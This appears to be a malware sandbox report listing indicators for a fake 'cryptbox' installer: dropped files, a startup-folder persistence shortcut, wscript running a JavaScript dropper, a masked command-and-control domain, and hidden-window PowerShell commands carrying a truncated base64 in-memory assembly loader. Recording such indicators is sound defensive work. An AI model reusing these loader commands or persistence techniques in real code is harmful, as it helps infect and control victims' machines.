Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\vista.ini.lnk
- %TEMP%\cryptbox_2020_8.21.exe
- %TEMP%\doc.js
- %TEMP%\is-m3cqc.tmp\cryptbox_2020_8.21.tmp
- %TEMP%\is-ejsmd.tmp\_isetup\_setup64.tmp
- %TEMP%\is-ejsmd.tmp\isxdl.dll
- %TEMP%\is-ejsmd.tmp\closeapp.exe
- %HOMEPATH%\appdata\vista.js
- 'tu###ong.top':80
- DNS ASK tu###ong.top
- '%TEMP%\cryptbox_2020_8.21.exe'
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\doc.js"
- '%TEMP%\is-m3cqc.tmp\cryptbox_2020_8.21.tmp' /SL5="$70232,6509374,238080,%TEMP%\Cryptbox_2020_8.21.exe"
- '%TEMP%\is-ejsmd.tmp\closeapp.exe' Cryptbox
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...